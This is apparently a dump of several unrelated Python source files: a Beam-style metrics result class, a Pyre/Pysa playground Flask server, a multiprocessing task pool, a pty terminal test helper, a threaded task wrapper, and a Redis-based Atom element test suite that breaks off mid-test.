self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
def monitoring_infos(self):
return [item for sublist in self._monitoring_infos.values() for item in
sublist]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable object including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
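# Querying results (sketch): once FnApiRunner.run_pipeline() returns a
# RunnerResult, user counters can be read with e.g.
#   result.metrics().query()['counters']
# and all runner/system metrics via result.monitoring_metrics().query().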
|
application.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import json
import logging
import os
import subprocess
import tempfile
import threading
from pathlib import Path
from typing import IO, List
from flask import Flask, request, jsonify
from flask_cors import CORS
from flask_socketio import SocketIO, emit
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG,
)
LOG: logging.Logger = logging.getLogger(__name__)
CUSTOM_PYSA_MODEL_FILE: str = "custom.pysa"
WATCHMAN_CONFIG_FILE: str = ".watchmanconfig"
PYRE_CONFIG_FILE: str = ".pyre_configuration"
INPUT_FILE: str = "input.py"
def _consume(stream: IO[str]) -> str:
buffer: List[str] = []
def _consume() -> None:
while True:
line = stream.readline()
if line:
decoded = line.strip()
LOG.debug(decoded)
buffer.append(decoded)
else:
break
thread = threading.Thread(target=_consume)
thread.start()
thread.join()
return "\n".join(buffer)
class Pyre:
def __init__(self) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Starting server in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
LOG.debug("Writing watchman configuration")
watchman_configuration_path = self._directory / WATCHMAN_CONFIG_FILE
watchman_configuration_path.write_text("{}\n")
LOG.debug("Starting watchman")
subprocess.check_call(["watchman", "watch", str(self._directory)])
LOG.debug("Priming the server")
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
subprocess.check_call(
["pyre", "--noninteractive", "check"], cwd=self._directory
)
def check(self, input: str) -> str:
LOG.debug("Running pyre check")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
with subprocess.Popen(
["pyre", "--output=json", "--noninteractive", "check"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stderr = _consume(process.stderr)
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stdout = _consume(process.stdout)
return_code = process.wait()
if return_code > 1:
LOG.error(f"Returning error: {stderr}")
result = jsonify(errors=[stderr])
else:
errors = json.loads(stdout)
result = jsonify(data={"errors": errors, "stderr": stderr})
return result
class Pysa:
def __init__(
self, input: str, model: str = "", use_builtin_pysa_models: bool = False
) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
self._stubs: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Intializing Pysa in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
"taint_models_path": [
str(self._stubs),
os.environ["PYSA_PLAYGROUND_TAINT_MODELS"],
]
if use_builtin_pysa_models
else str(self._stubs),
"search_path": [str(self._stubs), os.environ["PYSA_PLAYGROUND_STUBS"]],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
if model:
LOG.debug("Writing custom model to pysa file")
model_path = self._stubs / CUSTOM_PYSA_MODEL_FILE
model_path.write_text(model)
LOG.debug(f"Writing code:\n{input}")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
def analyze(self) -> None:
LOG.debug("Running pysa")
with subprocess.Popen(
["pyre", "-n", "analyze"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
model_verification_errors = []
model_verification_errors_found = False
            for line in iter(process.stderr.readline, ""):
line = line.rstrip()
if line == "":
break
elif "DEBUG" in line:
continue
elif "ERROR" in line and "is not part of the environment" in line:
model_verification_errors.append(line)
model_verification_errors_found = True
continue
elif model_verification_errors_found:
                    # Emit all model verification lines together to reduce
                    # network overhead.
emit(
"pysa_results_channel",
{
"type": "output",
"line": "\n".join(model_verification_errors),
},
)
LOG.debug("\n".join(model_verification_errors))
LOG.debug(line)
emit("pysa_results_channel", {"type": "output", "line": line})
return_code = process.wait()
if return_code != 0:
result = {"type": "finished", "result": "error"}
else:
result = {"type": "finished", "result": "ok"}
emit("pysa_results_channel", result)
application = Flask(__name__)
# You may need to restrict the allowed CORS origin to the pyre-check website
# before deployment.
CORS(application)
socketio = SocketIO(application, cors_allowed_origins="*")
@application.route("/check", methods=["GET", "POST"])
def check() -> str:
input = (
request.args.get("input")
or request.form.get("input")
or request.json.get("input")
)
if input is None:
return jsonify(errors=["Input not provided"])
LOG.info(f"Checking `{input}`...")
pyre = Pyre()
return pyre.check(input)
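# Example request against a locally running instance (host and port are
# illustrative; Flask defaults to 5000):
#   curl -X POST -d 'input=reveal_type(1)' http://localhost:5000/check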
@socketio.on("analyze", namespace="/analyze")
def analyze(json) -> None:
input = json.get("input", None)
use_builtin_pysa_models = json.get("use_builtin_pysa_models", False)
model = json.get("model", "")
if input is None:
emit(
"pysa_results_channel",
{
"type": "finished",
"result": "error",
"reason": "No code given to analyze.",
},
)
else:
pysa = Pysa(input, model, use_builtin_pysa_models)
LOG.info(f"Checking `{input}`...")
pysa.analyze()
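# Example client payload for the "analyze" event on the "/analyze" namespace
# (field values are illustrative):
#   {"input": "import os\nos.system(input())",
#    "model": "", "use_builtin_pysa_models": true}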
@application.route("/")
def index() -> str:
return "404"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
arguments: argparse.Namespace = parser.parse_args()
socketio.run(application, debug=arguments.debug)
|
parallel.py
|
"""Classes and methods to run predictions in parallel."""
# stdlib
import os
import math
import random
import time
from threading import Thread
from Queue import Queue as ThreadQueue
from multiprocessing import Process, Semaphore, cpu_count, Queue as ProcessQueue
# local
from .methods import Predictor
from ..microarraydata import MicroArrayData
from .. import config
#############################
# Parallelize #
#############################
class Pool(object):
"""Parallelize computing of Predictor tasks on one MicroArrayData dataset.
Specify the number of cores to use and other computational parameters. Add
    prediction.Predictor subclassed tasks by using the add_task or add_tasks methods.
    Finally, fit the data using the fit(data) method.
Attributes:
folder (str, optional): Location of the folder to use for (possible) output of computations.
            If not given, defaults to config.folder_results.
print_fitting_time (int): Output a print statement every [print_fitting_time] seconds.
processes (int, optional): Number of simultaneous threads to use for multiprocessing.
randomize (bool): Randomize order of computation.
        save_all_tasks (bool): If True, set task.save = True on every added task.
tasks (list): All prediction tasks that are to be computed. Add to this with the add_task or add_tasks methods.
verbose (int): Level of detailed output.
verbose == 0 :: no messages;
verbose >= 1 :: (default) messages of start and done methods and periodic small printouts;
verbose >= 2 :: set verbose level for all output methods too, for debugging tasks;
verbose >= 3 :: thread maintenance, for debugging this class.
"""
print_fitting_time = 600 # print once every 10 minutes.
# print_fitting_time = 10 # print once every 10 seconds.
def __init__(self, processes=None, tasks=None, folder=None, save_all_tasks=False, randomize=True, verbose=1):
"""Pool instance, where tasks can be added to
Args:
processes (None, optional): Description
tasks (None, optional): Description
folder (None, optional): Description
save_all_tasks (bool, optional): Description
randomize (bool, optional): Description
verbose (int, optional): Description
"""
self.processes = processes or config.ncores_total
self.folder = folder if folder is not None else config.folder_results
if not os.path.exists(self.folder):
if verbose: print '[Parallel] creating output folder at ' + self.folder
os.makedirs(self.folder)
self.save_all_tasks = save_all_tasks
self.randomize = randomize
self.verbose = verbose or config.verbose
self._semaphore = Semaphore(self.processes)
self.tasks = list()
if self.verbose:
if folder is not None:
print '[Parallel] overriding output folder of all tasks:', self.folder
else:
                print '[Parallel] using default output folder for all tasks:', self.folder
if self.verbose >= 2: print '[Parallel] all prediction tasks are set to verbose'
if self.verbose >= 3: print '[Parallel] detailed thread output'
if tasks: self.add_tasks(tasks)
def add_task(self, task):
"""Add a task to the pool.
Args:
task (TYPE):
"""
# assert issubclass(type(task), Predictor) # not necessary..
try:
assert task.processes <= self.processes
if self.folder: task.folder = self.folder # override with this
if self.save_all_tasks: task.save = True
if self.verbose >= 2: task.verbose = True
self.tasks.append(task)
            if self.verbose: print '[Parallel] added task', task.name, 'with', task.processes, 'process{}.'.format('es' if task.processes > 1 else '')
except AttributeError:
raise Exception('No processes found!')
def add_tasks(self, iterator):
for task in iter(iterator):
self.add_task(task)
def fit(self, data):
"""Main thread: adds task while semaphore free, else blocks.
Other thread is used to free up finished tasks. Quite simple to just
Args:
data (MicroArrayData): data.
"""
if self.verbose: print '[Parallel] fitting {} tasks with {} process{}...'.format(len(self.tasks),
self.processes, 'es' if self.processes > 1 else '')
assert issubclass(type(data), MicroArrayData)
start_time = time.time()
# need to use two different kinds of queues, one thread-safe and one process-safe
task_queue = ThreadQueue() # Pipe tasks between threads
result_queue = ProcessQueue() # Pipe results back to self.tasks list
# keep track of start time per task
def wrap_fit(task, data, index):
"""Wrapper of fit method, keep track of index of in self.task
list where the results will be put back to
"""
result_queue.put((task.fit(data), index))
# Thread - start processes and acquire semaphore
def add_processes(task_queue):
indices = range(len(self.tasks))
if self.randomize: random.shuffle(indices)
for index in indices:
task = self.tasks[index]
for _ in xrange(task.processes):
self._semaphore.acquire()
if self.verbose >= 3:
time.sleep(0.1)
                        print '[thread-start] acquired', task.processes, 'process{} for'.format('es' if task.processes > 1 else ''), task.name
p = Process(target=wrap_fit, args=(task, data, index))
# Need non-daemonic threads to use multiprocessed python processes.
p.daemon = False
p.start()
# Put tuple of process and associated task in queue.
task_queue.put((p, task))
            task_queue.put(None) # send sentinel
thread_add_processes = Thread(target=add_processes, args=(task_queue,))
thread_add_processes.start()
# Thread - maintain processes and release semaphore
def handle_processes(task_queue):
running_tasks = []
finished = False
print_count = 1
while not finished or len(running_tasks) > 0:
# check task_queue at intervals
if not task_queue.empty():
next_task = task_queue.get(timeout=0.1)
                    # receive STOP sentinel, finish
if next_task is None:
finished = True
else:
running_tasks.append(next_task)
# maintain process list;
for proc, task in running_tasks[:]:
if not proc.is_alive():
                        if self.verbose >= 3: print '[thread-maintain] releasing', task.processes, 'process{} for'.format('es' if task.processes > 1 else ''), task.name
for _ in xrange(task.processes):
self._semaphore.release()
proc.terminate()
running_tasks.remove((proc,task))
break # need when a process is found that is done!
time.sleep(.5)
# print currently running processes every once in a while.
if int((time.time() - start_time) / self.print_fitting_time) > print_count and self.verbose >= 1:
print '[Parallel][{:02d}h{:02d}m] running:'.format(*divmod(print_count*10, 60)),
for _, task in running_tasks:
if task == running_tasks[-1][1]: # last task
print '{}'.format(task.name)
else:
print '{},'.format(task.name),
# print '[Parallel] {} ({:d}:{:2d})'.format(task.name, *divmod(int(start_time_task[task.name] - time.time()/60), 60))
print_count += 1
thread_handle_processes = Thread(target=handle_processes, args=(task_queue,))
thread_handle_processes.start()
# Thread - catch results from result_queue and put back in self.task list
def handle_results():
processed_results = 0
while processed_results < len(self.tasks):
task, index = result_queue.get()
if self.verbose >= 3: print '[thread-result] saving result for', task.name, 'to task list'
self.tasks[index] = task
processed_results += 1
time.sleep(.1)
thread_handle_results = Thread(target=handle_results, args=())
thread_handle_results.start()
# block main thread
thread_add_processes.join()
thread_handle_processes.join()
thread_handle_results.join()
assert all((i.done for i in self.tasks))
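    # A minimal standalone sketch of the semaphore-as-core-budget pattern used
    # by fit() above (hypothetical job/cores values, kept as a comment):
    #
    #   sem = Semaphore(8)            # total core budget
    #   def run(job, cores):
    #       for _ in range(cores):    # reserve as many permits as the job needs
    #           sem.acquire()
    #       try:
    #           job()
    #       finally:
    #           for _ in range(cores):
    #               sem.release()     # hand the cores back when done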
@property
def result(self):
if not all((i.done for i in self.tasks)):
return None
return [i.result for i in self.tasks]
@property
def task_names(self):
return [i.name for i in self.tasks]
@property
def task_dict(self):
"""Dict: set of names (str) --> set of tasks (prediction.Predictor subclass)"""
return dict((task.name, task) for task in self.tasks)
@property
def result_dict(self):
"""Dict: set of names (str) --> set of results (causallib.CausalArray)"""
return dict((task.name, task.result) for task in self.tasks)
#############################
# Fit from file #
#############################
def fit_from_files(task_file, data_file, verbose=True):
"""Fit a prediction task using previously saved task file and data file"""
print_fitting_time = 1
if verbose: print '[FitFromFile] Called with \n\ttask: {}\n\tdata: {}'.format(task_file, data_file)
assert os.path.exists(task_file)
assert os.path.exists(data_file)
task = Predictor.pickle_load(task_file)
data = MicroArrayData.load(data_file)
start_time = time.time()
if verbose: print '[FitFromFile] Fitting {task.name} on {data.name}..'.format(task=task, data=data)
task.fit(data)
print_count = 1
if int((time.time() - start_time) / print_fitting_time) > print_count and verbose >= 1:
print '[FitFromFile][{:02d}h{:02d}m] running:'.format(*divmod(print_count*10, 60)),
print_count += 1
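# A hypothetical invocation sketch: both paths below are placeholders and
# assume the task and data were previously saved in the formats expected by
# Predictor.pickle_load and MicroArrayData.load.
#
#   fit_from_files('/tmp/tasks/run_a.pkl', '/tmp/data/expression.pkl',
#                  verbose=True)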
|
terminal.py
|
import sys
import pyte
import operator
import threading
from contextlib import contextmanager
import time
import os
if sys.platform.startswith("win"):
import winpty
else:
import ptyprocess
__all__ = ["PtyProcess", "Screen", "ByteStream", "Terminal"]
if sys.platform.startswith("win"):
ParentPtyProcess = winpty.PtyProcess
else:
ParentPtyProcess = ptyprocess.PtyProcess
class PtyProcess(ParentPtyProcess):
def read(self, nbytes):
if sys.platform.startswith("win"):
return super(PtyProcess, self).read(nbytes).encode("utf-8")
else:
return super(PtyProcess, self).read(nbytes)
def write(self, data):
if sys.platform.startswith("win"):
super(PtyProcess, self).write(data.decode("utf-8"))
else:
super(PtyProcess, self).write(data)
class Screen(pyte.Screen):
def __init__(self, process, *args, **kwargs):
self._process = process
super(Screen, self).__init__(*args, **kwargs)
def write_process_input(self, data):
self._process.write(data.encode("utf-8"))
class ByteStream(pyte.ByteStream):
def start_feeding(self):
screen = self.listener
process = screen._process
def reader():
while True:
try:
data = process.read(1024)
except EOFError:
break
if data:
self.feed(data)
t = threading.Thread(target=reader)
t.start()
class Var(object):
def __init__(self, getter):
self.getter = getter
def __getattr__(self, name):
# fallback methods
def _(*args, **kwargs):
return Var(lambda: getattr(self.getter(), name)(*args, **kwargs))
return _
def observe(self, *args, **kwargs):
return self.getter(*args, **kwargs)
def _assert(self, op, operand, timeout=5):
t = time.time()
while time.time() - t < timeout:
value = self.getter()
if op(value, operand):
break
time.sleep(0.05)
else:
raise Exception("value is {}".format(value))
def assert_startswith(self, operand, timeout=5):
self._assert(str.startswith, operand, timeout)
def assert_endswith(self, operand, timeout=5):
self._assert(str.endswith, operand, timeout)
def assert_equal(self, operand, timeout=5):
self._assert(operator.eq, operand, timeout)
def assert_contains(self, operand, timeout=5):
self._assert(operator.contains, operand, timeout)
class Terminal(object):
def __init__(self, process, screen, stream):
self.process = process
self.screen = screen
self.stream = stream
@classmethod
@contextmanager
def open(cls, cmd):
# github actions windows-2019 doesn't like (24, 80)
env = os.environ.copy()
env["RETICULATE_PYTHON"] = sys.executable
        # don't prompt to install miniconda
env["RETICULATE_MINICONDA_ENABLED"] = "0"
process = PtyProcess.spawn(cmd, dimensions=(40, 80), env=env)
screen = Screen(process, 80, 40)
stream = ByteStream(screen)
stream.start_feeding()
try:
yield cls(process, screen, stream)
finally:
process.terminate(force=True)
def sendintr(self):
self.process.sendintr()
def isalive(self):
return self.process.isalive()
def write(self, x):
self.process.write(x.encode('utf-8'))
def _line(self, num=0):
# parent's `line` method
return self.screen.display[num]
def line(self, num=0):
return Var(lambda: self._line(num))
def cursor(self):
return Var(lambda: (self.screen.cursor.x, self.screen.cursor.y))
def current_line(self):
return Var(lambda: self._line(self.screen.cursor.y))
def previous_line(self, num=1):
return Var(lambda: self._line(self.screen.cursor.y - num))
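# --- usage sketch (hypothetical, not part of the original module) ---
# Illustrates the polling-assert style of Var/Terminal; the spawned command
# and the expected prompt/output are only illustrative.
#
#   with Terminal.open(["python", "-i"]) as t:
#       t.current_line().strip().assert_startswith(">>>")
#       t.write("1 + 1\n")
#       t.previous_line(1).strip().assert_endswith("2")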
|
task.py
|
from .debug import Logger
from threading import Thread
mylog = Logger()
class Task(object):
    def __init__(self, function=None):
        """
        Base async task object wrapping a callable that can be run on a
        background thread via delay().
        """
        self.name = "Task"
        self.function = function
    def delay(self, *args):
        # `async` became a reserved word in Python 3.7, so the worker method
        # is named run_async instead of the original `async`.
        background_send = Thread(target=self.run_async, args=(self.function,) + args)
        background_send.start()
        return background_send
    def run_async(self, task, *args):
        try:
            task(*args)
            mylog.debug("Successful")
        except Exception:
            mylog.debug("Error")
def shared_task(*args):
    # Return a Task wrapping the given callable, or a bare Task if no
    # callable was provided.
    try:
        return Task(args[0])
    except IndexError:
        return Task()
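# --- usage sketch (hypothetical, not part of the original module) ---
# shared_task wraps a plain callable so it can be fired on a background
# thread via delay(); `notify` is a placeholder function.
#
#   def notify(address, message):
#       print("sending", message, "to", address)
#
#   task = shared_task(notify)
#   worker = task.delay("alice@example.com", "hello")   # runs notify in a Thread
#   worker.join()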
|
test_atom.py
|
import copy
import gc
import os
import random
import time
from multiprocessing import Process, Queue
from threading import Thread
import numpy as np
import pytest
import redis
from atom import AtomError, Element, MetricsLevel, SetEmptyError
from atom.config import (
ATOM_CALLBACK_FAILED,
ATOM_COMMAND_NO_ACK,
ATOM_COMMAND_NO_RESPONSE,
ATOM_COMMAND_UNSUPPORTED,
ATOM_NO_ERROR,
ATOM_USER_ERRORS_BEGIN,
COMMAND_LIST_COMMAND,
DEFAULT_REDIS_PORT,
DEFAULT_REDIS_SOCKET,
HEALTHCHECK_COMMAND,
HEALTHCHECK_RETRY_INTERVAL,
LANG,
REDIS_PIPELINE_POOL_SIZE,
VERSION,
VERSION_COMMAND,
)
from atom.element import ElementConnectionTimeoutError
from atom.messages import Response, StreamHandler
from msgpack import unpackb
from redistimeseries.client import Client as RedisTimeSeries
pytest.caller_incrementor = 0
pytest.responder_incrementor = 0
TEST_REDIS_SOCKET = os.getenv("TEST_REDIS_SOCKET", DEFAULT_REDIS_SOCKET)
TEST_REDIS_HOST = os.getenv("TEST_REDIS_HOST", None)
TEST_REDIS_PORT = os.getenv("TEST_REDIS_PORT", DEFAULT_REDIS_PORT)
class TestAtom:
def _assert_cleaned_up(self, element):
for s in element.streams:
private_sn = element._make_stream_id(element.name, s)
exists_val = element._rclient.exists(private_sn)
assert not exists_val, "private redis stream key %s should not exist" % (
private_sn,
)
def _element_create(
self,
name,
host=TEST_REDIS_HOST,
port=TEST_REDIS_PORT,
socket_path=TEST_REDIS_SOCKET,
conn_timeout_ms=2000,
data_timeout_ms=5000,
):
# Make sure metrics is enabled. Some tests turn it off
os.environ["ATOM_USE_METRICS"] = "TRUE"
return Element(
name,
host=host,
port=port,
socket_path=socket_path,
conn_timeout_ms=conn_timeout_ms,
data_timeout_ms=data_timeout_ms,
)
def _element_start(
self,
element,
caller,
read_block_ms=500,
do_healthcheck=True,
healthcheck_interval=0.5,
):
element.command_loop(block=False, read_block_ms=read_block_ms)
if do_healthcheck:
caller.wait_for_elements_healthy(
[element.name], retry_interval=healthcheck_interval
)
def _element_cleanup(self, element):
element.command_loop_shutdown(block=True)
element._clean_up()
def _get_redis_client(self):
if TEST_REDIS_HOST is not None:
client = redis.StrictRedis(host=TEST_REDIS_HOST, port=TEST_REDIS_PORT)
else:
client = redis.StrictRedis(unix_socket_path=TEST_REDIS_SOCKET)
return client
@pytest.fixture(autouse=True)
def client(self):
"""
Run at setup, creates a redis client and flushes
all existing keys in the DB to ensure no interaction
between the tests and a fresh startup state between the
tests
"""
client = self._get_redis_client()
client.flushall()
keys = client.keys()
assert keys == []
yield client
del client
@pytest.fixture
def caller(self, client, check_redis_end, metrics):
"""
Sets up the caller before each test function is run.
Tears down the caller after each test is run.
"""
# Want to be at the highest log level for testing
os.environ["ATOM_LOG_LEVEL"] = "DEBUG"
caller_name = "test_caller_%s" % (pytest.caller_incrementor,)
caller = self._element_create(caller_name)
yield caller, caller_name
pytest.caller_incrementor += 1
# Need to manually call the delete method to
# clean up the object since garbage collection
# won't get to it until all fixtures have run and
# then the check_redis_end fixture won't be able
# to see how well we cleaned up
caller._clean_up()
@pytest.fixture
def responder(self, client, check_redis_end, metrics):
"""
Sets up the responder before each test function is run.
Tears down the responder after each test is run.
"""
responder_name = "test_responder_%s" % (pytest.responder_incrementor,)
responder = self._element_create(responder_name)
yield responder, responder_name
pytest.responder_incrementor += 1
# Need to manually call the delete method to
# clean up the object since garbage collection
# won't get to it until all fixtures have run and
# then the check_redis_end fixture won't be able
# to see how well we cleaned up
responder._clean_up()
@pytest.fixture(autouse=True)
def check_redis_end(self):
"""
Runs at end -- IMPORTANT: must depend on caller and responder
in order to ensure it runs after the caller and responder
cleanup.
"""
client = self._get_redis_client()
yield client
keys = client.keys()
assert keys == [] or keys == [b"log"]
del client
@pytest.fixture
def metrics(self):
metrics = RedisTimeSeries(unix_socket_path="/shared/metrics.sock")
metrics.redis.flushall()
yield metrics
del metrics
def test_caller_responder_exist(self, caller, responder):
"""
Ensures that the caller and responder were created with the proper
names.
"""
caller, caller_name = caller
responder, responder_name = responder
print(caller.get_all_elements())
assert responder_name in caller.get_all_elements()
assert caller_name in responder.get_all_elements()
def test_id_generation(self, caller):
"""
Ensures id generation functions are working with expected input.
"""
caller, caller_name = caller
assert caller._make_response_id("abc") == "response:abc"
assert caller._make_command_id("abc") == "command:abc"
assert caller._make_stream_id("abc", "123") == "stream:abc:123"
def test_command_in_redis(self, caller, responder):
"""
Tests caller sending command and verifies that command was sent properly
in Redis.
"""
caller, caller_name = caller
responder, responder_name = responder
proc = Process(
target=caller.command_send,
args=(
responder_name,
"test_cmd",
0,
),
)
proc.start()
data = caller._rclient.xread(
{caller._make_command_id(responder_name): "$"}, block=1000
)
proc.join()
stream, msgs = data[0] # since there's only one stream
assert stream.decode() == "command:%s" % (responder_name,)
_id, msg = msgs[0]
assert msg[b"element"].decode() == caller_name
assert msg[b"cmd"] == b"test_cmd"
assert msg[b"data"] == b"0"
def test_add_entry_and_get_n_most_recent(self, caller, responder):
"""
Adds 10 entries to the responder's stream and makes sure that the
proper values are returned from get_n_most_recent.
"""
caller, caller_name = caller
responder, responder_name = responder
for i in range(10):
responder.entry_write("test_stream", {"data": i})
entries = caller.entry_read_n(responder_name, "test_stream", 5)
assert len(entries) == 5
assert entries[0]["data"] == b"9"
assert entries[-1]["data"] == b"5"
def test_add_entry_with_override_element_name(self, caller, responder):
"""
Adds an entry to the responder stream with a fake element name and
makes sure that entry is on correct stream.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.entry_write(
"test_stream", {"data": "fake"}, element_name="fake_element"
)
# assert that entries are on override element stream
entries = caller.entry_read_since("fake_element", "test_stream", last_id=0)
assert len(entries) == 1
assert entries[0]["data"] == b"fake"
# assert that writing element stream is empty
entries = caller.entry_read_since(responder_name, "test_stream", last_id=0)
assert len(entries) == 0
# clean up stream (necessary since it doesn't belong to a real element)
caller._rclient.unlink("stream:fake_element:test_stream")
def test_add_entry_and_get_n_most_recent_legacy_serialize(self, caller, responder):
"""
Adds 10 entries to the responder's stream with legacy serialization
and makes sure that the proper values are returned from
get_n_most_recent.
"""
caller, caller_name = caller
responder, responder_name = responder
for i in range(10):
data = {"data": i}
responder.entry_write("test_stream_serialized", data, serialize=True)
            # Ensure that serialization keeps the original data intact
assert data["data"] == i
entries = caller.entry_read_n(
responder_name, "test_stream_serialized", 5, deserialize=True
)
assert len(entries) == 5
assert entries[0]["data"] == 9
assert entries[-1]["data"] == 5
def test_add_entry_and_get_n_most_recent_arrow_serialized(self, caller, responder):
"""
Adds 10 entries to the responder's stream with Apache Arrow
serialization and makes sure that the proper values are returned
from get_n_most_recent without specifying deserialization
method in method call, instead relying on serialization key embedded
within entry.
"""
caller, caller_name = caller
responder, responder_name = responder
for i in range(10):
data = {"data": i}
responder.entry_write(
"test_stream_arrow_serialized", data, serialization="arrow"
)
            # Ensure that serialization keeps the original data intact
assert data["data"] == i
entries = caller.entry_read_n(responder_name, "test_stream_arrow_serialized", 5)
assert len(entries) == 5
assert entries[0]["data"] == 9
assert entries[-1]["data"] == 5
def test_add_entry_and_get_n_most_recent_arrow_numpy_serialized(
self, caller, responder
):
"""
Adds 10 entries to the responder's stream with Apache Arrow
serialization and makes sure the proper values are returned from
get_n_most_recent without specifying deserialization method in
method call, instead relying on serialization key embedded within
entry.
"""
caller, caller_name = caller
responder, responder_name = responder
for i in range(10):
data = {"data": np.ones((3, 3)) * i}
responder.entry_write(
"test_stream_arrow_numpy_serialized", data, serialization="arrow"
)
entries = caller.entry_read_n(
responder_name, "test_stream_arrow_numpy_serialized", 5
)
assert len(entries) == 5
assert np.array_equal(entries[0]["data"], np.ones((3, 3)) * 9)
assert np.array_equal(entries[-1]["data"], np.ones((3, 3)) * 5)
def test_add_entry_arrow_serialize_custom_type(self, caller, responder):
"""
Attempts to add an arrow-serialized entry of a custom
(not Python built-in) type. Ensures that TypeError is raised.
"""
caller, caller_name = caller
responder, responder_name = responder
class CustomClass:
pass
inst = CustomClass()
with pytest.raises(TypeError) as excinfo:
responder.entry_write(
"test_arrow_custom_type", {"data": inst}, serialization="arrow"
)
print(excinfo.value)
assert "not serializeable by pyarrow without pickling" in str(excinfo.value)
# Test collection containing non-serializeable type
with pytest.raises(TypeError) as excinfo:
responder.entry_write(
"test_arrow_custom_type", {"data": [inst]}, serialization="arrow"
)
print(excinfo.value)
assert "not serializeable by pyarrow without pickling" in str(excinfo.value)
def test_add_command(self, responder):
"""
Ensures that a command can be added to a responder.
"""
responder, responder_name = responder
responder.command_add("test_command", lambda x: x, timeout=123)
assert "test_command" in responder.handler_map
assert responder.timeouts["test_command"] == 123
def test_clean_up_stream(self, responder):
"""
Ensures that a stream can be removed from Redis and removed from
responder's streams set.
"""
responder, responder_name = responder
responder.entry_write("clean_me", {"data": 0})
assert "stream:%s:clean_me" % (responder_name,) in responder.get_all_streams()
responder.clean_up_stream("clean_me")
assert (
"stream:%s:clean_me" % (responder_name,) not in responder.get_all_streams()
)
assert "clean_me" not in responder.streams
self._assert_cleaned_up(responder)
def test_clean_up_stream_element_name(self, caller, responder):
"""
Ensures an element can clean up a stream with a different element
name.
"""
responder, responder_name = responder
responder.entry_write("clean_me", {"data": 0}, element_name="fake")
# have responder element clean up stream with fake element name
responder.clean_up_stream("clean_me", element_name="fake")
stream_exists = responder._rclient.exists("stream:clean_me:fake")
assert not stream_exists
def test_clean_up(self, responder):
"""
Ensures that a responder can be removed from Redis
"""
responder, responder_name = responder
new_responder = self._element_create("new_responder")
assert "new_responder" in responder.get_all_elements()
del new_responder
# Explicitly invoke collection after ref count set to 0
gc.collect()
assert "new_responder" not in responder.get_all_elements()
def test_command_response(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
self._element_start(responder, caller)
response = caller.command_send(responder_name, "add_1", 42)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
def test_log_fail_in_command_loop(self, caller, responder):
caller, caller_name = caller
responder, responder_name = responder
def fail(x):
raise ValueError("oh no")
responder.command_add("fail", fail)
# this should be a non-blocking call
responder.command_loop(n_workers=1, block=False)
caller.command_send(responder_name, "fail", 42)
responder.command_loop_shutdown()
del responder
def test_command_response_n_workers_2_no_fork(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
# this should be a non-blocking call
responder.command_loop(n_workers=2, block=False)
response = caller.command_send(responder_name, "add_1", 42)
response2 = caller.command_send(responder_name, "add_1", 43)
response3 = caller.command_send(responder_name, "add_1", 44)
responder.command_loop_shutdown()
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
assert response2["err_code"] == ATOM_NO_ERROR
assert response2["data"] == b"44"
assert response3["err_code"] == ATOM_NO_ERROR
assert response3["data"] == b"45"
time.sleep(0.5)
del responder
def test_command_response_n_workers_2_threads(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
thread = Thread(target=responder.command_loop, kwargs={"n_workers": 2})
thread.start()
response = caller.command_send(responder_name, "add_1", 42)
response2 = caller.command_send(responder_name, "add_1", 43)
response3 = caller.command_send(responder_name, "add_1", 44)
responder.command_loop_shutdown()
thread.join()
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
assert response2["err_code"] == ATOM_NO_ERROR
assert response2["data"] == b"44"
assert response3["err_code"] == ATOM_NO_ERROR
assert response3["data"] == b"45"
def test_command_response_n_workers_2(self, caller, responder):
"""
